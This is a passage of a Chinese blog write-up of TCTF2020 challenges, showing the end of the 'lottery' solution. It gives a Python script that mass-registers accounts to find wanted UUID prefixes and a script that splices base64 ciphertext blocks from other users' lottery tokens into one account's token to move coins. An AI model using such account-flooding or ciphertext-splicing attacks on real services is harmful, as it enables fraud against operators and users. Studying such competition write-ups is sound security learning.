class="line">	r = requests.post(url=url,data=data)</span><br><span class="line">	<span class="keyword">return</span> r.json</span><br><span class="line"></span><br><span class="line">passwd = <span class="number">123</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10000</span>):</span><br><span class="line">	usname = <span class="string">""</span></span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(random.randint(<span class="number">0</span>,<span class="number">20</span>)):</span><br><span class="line">		usname += random.choice(usnamelist)</span><br><span class="line">	print(register(usname,passwd,register_url))</span><br></pre></td></tr></table></figure>

<p>可以利用 linux 的管道方便地拿到满足要求的用户信息：</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">python3 lottery爆破用户名.py | grep <span class="string">'"uuid":"bc'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"misiifcyboqwa","uuid":"bca638f6-ffb4-4c12-8c79-42add23d90e5","updated_at":"2020-07-01T05:41:02.000000Z","created_at":"2020-07-01T05:41:02.000000Z","id":630605&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"pnihrkpjeocgynhz","uuid":"bce2d26c-92fa-48fc-a2c2-d5ff5e1da6f5","updated_at":"2020-07-01T05:42:09.000000Z","created_at":"2020-07-01T05:42:09.000000Z","id":630734&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"tkb","uuid":"bc10a197-1215-4c4e-bdbe-25145108198d","updated_at":"2020-07-01T05:42:46.000000Z","created_at":"2020-07-01T05:42:46.000000Z","id":630799&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"csuxhbbrdtebsdpue","uuid":"bc87488d-caee-411a-bf4f-c75a17090b5a","updated_at":"2020-07-01T05:44:52.000000Z","created_at":"2020-07-01T05:44:52.000000Z","id":631052&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"kncwealurtcj","uuid":"bc7a033e-d341-42a0-b931-08592ee81e2f","updated_at":"2020-07-01T05:47:43.000000Z","created_at":"2020-07-01T05:47:43.000000Z","id":631362&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"cwbaszukw","uuid":"bc09265e-f0d6-4104-bd11-bd6d29835a00","updated_at":"2020-07-01T05:50:03.000000Z","created_at":"2020-07-01T05:50:03.000000Z","id":631663&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"uhenpkasxlveidif","uuid":"bc00fef1-ec7b-48e6-bc86-3f2ee89da15b","updated_at":"2020-07-01T05:51:13.000000Z","created_at":"2020-07-01T05:51:13.000000Z","id":631786&#125;&#125;'</span></span><br><span class="line">b<span class="string">'&#123;"user":&#123;"username":"vwurpqhaavjihvuqokyx","uuid":"bc248486-e6d2-437d-8b2d-ee2c3dad1a72","updated_at":"2020-07-01T05:55:55.000000Z","created_at":"2020-07-01T05:55:55.000000Z","id":632333&#125;&#125;'</span></span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>然后用下面的代码进行替换，将其他用户的 lottery 替换掉 user1 的 lottery，如此以来，就可以将其他用户的 coin 转移给 user1了，即可购买 flag。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line">now_c = <span class="string">"IpG6gymO3Jhd9hgirFfF\\/GZ9An9W7hmfpWnFZEvQ9V4wKQrh4UbaaAm0rp2g2I4WirFyVLzg5KZKQxsPrT53Wot80sjMPhsXy0irOua24Da9KDh1YiMsqS6Q6KJWU5xTdbZ34x8c0bloA9X4\\/fMN6vbSt9reYD8AcCI4hIXsxZg="</span></span><br><span class="line"><span class="comment">#now_c = now_c.decode('utf-8')</span></span><br><span class="line">another_c = <span class="string">"RNeqoksqjZqjs30IlB4JPaQykvrhhJLviciRBGyYNT0DZbqCkAeQT3L9wJeKwt2FtxIuzzKznobqBur9sRvygvv3jwyYLL1MQR7+AzHT7kug1CQEqkGMqmKZk4ZsdpGluPGbrp5x9YrQ3PKM0MXGcvbSt9reYD8AcCI4hIXsxZg="</span></span><br><span class="line"><span class="comment">#another_c = another_c.decode('utf-8')</span></span><br><span class="line"></span><br><span class="line">now_c = base64.b64decode(now_c).encode(<span class="string">'hex'</span>)</span><br><span class="line">another_c = base64.b64decode(another_c).encode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="keyword">print</span> now_c</span><br><span class="line"><span class="keyword">print</span> another_c</span><br><span class="line"></span><br><span class="line">index = <span class="number">128</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> urllib.quote(base64.b64encode((another_c[:index] + now_c[index:]).decode(<span class="string">'hex'</span>)))</span><br></pre></td></tr></table></figure>

<p>注意由于每个 lottery 只能用一次，因此每个用于提供 coin 的用户每次都要重新生成 lottery，然后对 user1 的lottery进行替换即可。</p>
<p>还需要注意一点，由于 token 的存在，同一台 PC 只能保持一个用户的连接，再开一台虚拟机登录其他用户提供 coin 即可。</p>
<p>效果如下：</p>
<p><img src="http://ggb0n.cool/images/tctf24.png" alt=""></p>
<p><img src="http://ggb0n.cool/images/tctf25.png" alt=""></p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://ggb0n.cool/2020/06/29/TCTF2020部分题解/">TCTF2020部分题解</a></li><li><strong>Post Author: </strong><a href="http://ggb0n.cool">ggb0n</a></li><li><strong>Post Link: </strong><a href="http://ggb0n.cool/2020/06/29/TCTF2020部分题解/">http://ggb0n.cool/2020/06/29/TCTF2020部分题解/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/07/26/DASCTF%E4%B8%83%E6%9C%88%E6%9C%88%E8%B5%9BPWN/" target="_blank">DASCTF七月月赛PWN</a><br></span><span>  2.<a class="is-size-6" href="/2020/07/26/CybricsCTF/" target="_blank">CybricsCTF</a><br></span><span>  3.<a class="is-size-6" href="/2020/06/25/DASCTF%E5%85%AD%E6%9C%88%E6%9C%88%E8%B5%9B/" target="_blank">DASCTF六月月赛</a><br></span><span>  4.<a class="is-size-6" href="/2020/05/02/De1CTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" target="_blank">De1CTF2020部分题解</a><br></span><span>  5.<a class="is-size-6" href="/2020/04/25/%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9BDSACTF/" target="_blank">安恒月赛DASCTF</a><br></span><span>  6.<a class="is-size-6" href="/2020/03/07/%E9%AB%98%E6%A0%A1%E6%88%98%E7%96%AB%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" target="_blank">高校战&quot;疫&quot;部分题解</a><br></span><span>  7.<a class="is-size-6" href="/2020/02/29/V&amp;N%E5%85%AC%E5%BC%80%E8%B5%9B/" target="_blank">V&amp;N公开赛</a><br></span><span>  8.<a class="is-size-6" href="/2020/02/26/%E5%AE%89%E6%81%92-%E6%8A%97%E7%96%AB%E6%9C%88%E8%B5%9B/" target="_blank">安恒-抗疫月赛</a><br></span></div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Recommend Post</span><br><span>  1.<a class="is-size-6" href="/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" target="_blank">TCTF2020部分题解</a><br></span><span>  2.<a class="is-size-6" href="/2020/06/26/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4pwn%E9%A2%98%E7%BB%83%E4%B9%A0/" target="_blank">第五空间pwn题练习</a><br></span><span>  3.<a class="is-size-6" href="/2020/06/07/%E5%A0%86%E6%BA%A2%E5%87%BA-Tcache_Attack/" target="_blank">堆溢出-Tcache_Attack</a><br></span><span>  4.<a class="is-size-6" href="/2020/06/07/%E5%A0%86%E6%BA%A2%E5%87%BA-Housese_Of_XXX/" target="_blank">堆溢出-Housese_Of_XXX</a><br></span><span>  5.<a class="is-size-6" href="/2020/06/01/%E5%A0%86%E6%BA%A2%E5%87%BA%E5%9F%BA%E7%A1%80/" target="_blank">堆溢出基础</a><br></span><span>  6.<a class="is-size-6" href="/2020/05/13/%E5%85%A5%E5%9D%91%E4%BA%8C%E8%BF%9B%E5%88%B6/" target="_blank">入坑二进制</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button is-success donate"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="http://ggb0n.cool/images/emFuc2hhbmc=.png" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/07/09/BUU%E5%A0%86%E6%BA%A2%E5%87%BA%E8%AE%AD%E7%BB%83/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">BUU堆溢出训练</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/06/26/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4pwn%E9%A2%98%E7%BB%83%E4%B9%A0/"><span class="level-item">第五空间pwn题练习</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            id: 'aac8da2e055be0b7480d8686371e5dea',
            repo: 'blog_comment',
            owner: 'ggb0n',
            clientID: '0a75c84e24da4e774d10',
            clientSecret: '80c72733da730b019e5047ae6c7eff937914a4d9',
            admin: ["ggb0n"],
            createIssueManually: true,
            distractionFreeMode: true,
            perPage: 10,
            pagerDirection: 'last',
            
            
            enableHotKey: true,
            isLocked: false
        })
        gitalk.render('comment-container')});</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-Cloud-Computing" href="#Cloud-Computing"><span>Cloud Computing</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-解题" href="#解题"><span>解题</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-Wechat-Generator" href="#Wechat-Generator"><span>Wechat Generator</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-解题-1" href="#解题-1"><span>解题</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-easyphp" href="#easyphp"><span>easyphp</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-解题-2" href="#解题-2"><span>解题</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-noeasyphp" href="#noeasyphp"><span>noeasyphp</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-解题-3" href="#解题-3"><span>解题</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-lottery" href="#lottery"><span>lottery</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-解题-4" href="#解题-4"><span>解题</span></a></li><li><a class="is-flex toc-item" id="toc-item-分析过程" href="#分析过程"><span>分析过程</span></a></li></ul></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="is-rounded" src="http://ggb0n.cool/images/header.jpg" alt="ggb0n"></figure><p class="title is-size-4 is-block line-height-inherit">ggb0n</p><p class="is-size-6 is-block">闭关ing。。。</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>伟大的中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">41</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">15</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">117</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ggb0n" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/ggb0n"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="https://weibo.com/u/5955623314"><i class="fab fa-weibo"></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="mailto:gg.b0n@qq.com"><i class="fa fa-envelope"></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="https://ggb0n.github.io/"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div><div><hr><p id="hitokoto">:D 一言句子获取中...</p><script type="text/javascript" defer>function getYiyan(){
                                $.getJSON("https://v1.hitokoto.cn/", function (data) {
                                if(data){
                                    $('#hitokoto').html("");
                                    $('#hitokoto').append("<strong style='color: #3273dc;'>"+data.hitokoto+"</strong>"+
                                    "<p>"+"来源《"+data.from+"》</p><p>提供者-"+data.creator+"</p>");
                                }});}
                                $(function (){getYiyan();$('#hitokoto').click(function(){getYiyan();})});</script></div></div></div><div class="card widget"><div class="card-content"><h3 class="menu-label">Latest Comment</h3><span class="body_hot_comment">Loading...Wait a Minute!</span></div></div><div class="card widget"><div class="card-content"><h3 class="menu-label">Recent</h3><article class="media"><div class="media-content size-small"><p><time dateTime="2020-07-26T07:04:04.000Z">2020-07-26</time></p><p class="title is-6"><a class="link-muted" href="/2020/07/26/DASCTF%E4%B8%83%E6%9C%88%E6%9C%88%E8%B5%9BPWN/">DASCTF七月月赛PWN</a></p><p class="is-uppercase"><i class="fas fa-folder-open has-text-grey"> </i><a class="link-muted" href="/categories/CTF/">CTF</a> / <a class="link-muted" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%88%92%E6%B0%B4/">比赛划水</a></p></div></article><article class="media"><a class="media-left" href="/2020/07/26/CybricsCTF/"><p class="image is-64x64"><img class="thumbnail" src="http://ggb0n.cool/images/cybrics00.png" alt="CybricsCTF"></p></a><div class="media-content size-small"><p><time dateTime="2020-07-26T03:07:55.000Z">2020-07-26</time></p><p class="title is-6"><a class="link-muted" href="/2020/07/26/CybricsCTF/">CybricsCTF</a></p><p class="is-uppercase"><i class="fas fa-folder-open has-text-grey"> </i><a class="link-muted" href="/categories/CTF/">CTF</a> / <a class="link-muted" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%88%92%E6%B0%B4/">比赛划水</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-07-09T14:35:56.000Z">2020-07-09</time></p><p class="title is-6"><a class="link-muted" href="/2020/07/09/BUU%E5%A0%86%E6%BA%A2%E5%87%BA%E8%AE%AD%E7%BB%83/">BUU堆溢出训练</a></p><p class="is-uppercase"><i class="fas fa-folder-open has-text-grey"> </i><a class="link-muted" href="/categories/CTF/">CTF</a> / <a class="link-muted" href="/categories/CTF/BUU%E5%88%B7%E9%A2%98/">BUU刷题</a></p></div></article><article class="media"><a class="media-left" href="/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/"><p class="image is-64x64"><img class="thumbnail" src="http://ggb0n.cool/images/tctf-top.png" alt="TCTF2020部分题解"></p></a><div class="media-content size-small"><p><time dateTime="2020-06-29T08:47:34.000Z">2020-06-29</time></p><p class="title is-6"><a class="link-muted" href="/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/">TCTF2020部分题解</a></p><p class="is-uppercase"><i class="fas fa-folder-open has-text-grey"> </i><a class="link-muted" href="/categories/CTF/">CTF</a> / <a class="link-muted" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%88%92%E6%B0%B4/">比赛划水</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-06-26T15:37:19.000Z">2020-06-26</time></p><p class="title is-6"><a class="link-muted" href="/2020/06/26/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4pwn%E9%A2%98%E7%BB%83%E4%B9%A0/">第五空间pwn题练习</a></p><p class="is-uppercase"><i class="fas fa-folder-open has-text-grey"> </i><a class="link-muted" href="/categories/CTF/">CTF</a> / <a class="link-muted" href="/categories/CTF/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/">赛题复现</a></p></div></article></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Categories</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">32</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/CTF/BUU%E5%88%B7%E9%A2%98/"><span class="level-start"><span class="level-item">BUU刷题</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/web%E5%AE%89%E5%85%A8/"><span class="level-start"><span class="level-item">web安全</span></span><span class="level-end"><span class="level-item tag">6</span></span></a><ul class="mr-0"><li><a class="level is-mobile is-marginless" href="/categories/CTF/web%E5%AE%89%E5%85%A8/BUU%E5%88%B7%E9%A2%98/"><span class="level-start"><span class="level-item">BUU刷题</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/web%E5%AE%89%E5%85%A8/CTFHub%E5%88%B7%E9%A2%98/"><span class="level-start"><span class="level-item">CTFHub刷题</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li></ul></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/web%E5%AE%89%E5%85%A8-BUU%E5%88%B7%E9%A2%98/"><span class="level-start"><span class="level-item">web安全 - BUU刷题</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/%E4%BA%8C%E8%BF%9B%E5%88%B6/"><span class="level-start"><span class="level-item">二进制</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%88%92%E6%B0%B4/"><span class="level-start"><span class="level-item">比赛划水</span></span><span class="level-end"><span class="level-item tag">10</span></span></a></li><li><a class="level is-mobile is-marginless" href="/categories/CTF/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/"><span class="level-start"><span class="level-item">赛题复现</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li></ul></li><li><a class="level is-mobile is-marginless" href="/categories/CTF-%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/"><span class="level-start"><span class="level-item">CTF - 赛题复现</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><a class="level is-mobile is-marginless" href="/categories/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2020/07/"><span class="level-start"><span class="level-item">July 2020</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/06/"><span class="level-start"><span class="level-item">June 2020</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/05/"><span class="level-start"><span class="level-item">May 2020</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/04/"><span class="level-start"><span class="level-item">April 2020</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/03/"><span class="level-start"><span class="level-item">March 2020</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><a class="level is-mobile is-marginless" href="/archives/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/SQL%E6%B3%A8%E5%85%A5/"><span class="tag">SQL注入</span><span class="tag is-grey-lightest">10</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Cookie%E6%94%BB%E5%87%BB/"><span class="tag">Cookie攻击</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/JWT%E4%BC%AA%E9%80%A0/"><span class="tag">JWT伪造</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/RSA%E6%94%BB%E5%87%BB/"><span class="tag">RSA攻击</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/bypass-functions-disable/"><span class="tag">bypass functions_disable</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><span class="tag">反序列化漏洞</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"><span class="tag">文件上传</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/webshell/"><span class="tag">webshell</span><span class="tag is-grey-lightest">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8/"><span class="tag">布尔盲注</span><span class="tag is-grey-lightest">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Linux/"><span class="tag">Linux</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/RCE/"><span class="tag">RCE</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/SSRF/"><span class="tag">SSRF</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/SSTI/"><span class="tag">SSTI</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5/"><span class="tag">二次注入</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%80%83%E9%80%B8%E6%BC%8F%E6%B4%9E/"><span class="tag">反序列化逃逸漏洞</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%A0%86%E6%BA%A2%E5%87%BA/"><span class="tag">堆溢出</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"><span class="tag">报错注入</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89/"><span class="tag">条件竞争</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CVE/"><span class="tag">CVE</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/IO-FILE%E6%BC%8F%E6%B4%9E/"><span class="tag">IO_FILE漏洞</span><span class="tag is-grey-lightest">2</span></a></div></div><div class="field is-grouped is-grouped-multiline"><a class="tags has-addons" href="/tags/"><span class="tag">查看全部&gt;&gt;</span></a></div></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe to Updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=ggb0nsBlog&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="ggb0nsBlog" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button is-primary" type="submit" value="Subscribe"></div></div><p class="help">输入邮箱订阅本博客，更博后邮件通知师傅！👾</p></form></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo1.png" alt="ggb0n&#039;s Blog" height="28"></a><p class="size-small"><span>&copy; 2020 ggb0n</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© <a href="http://www.beian.miit.gov.cn/" target="_blank">豫ICP备20003023号</a><br></span><span>© Copyright：All contents of this blog are learned from the Internet or original,Facilitate<br />&nbsp;&nbsp;&nbsp;&nbsp;learning and communication, if there is infringement，Please <a href="/message" target="_blank">leave a message</a>.<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/02/02 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ggb0n"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://ggb0n.cool',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
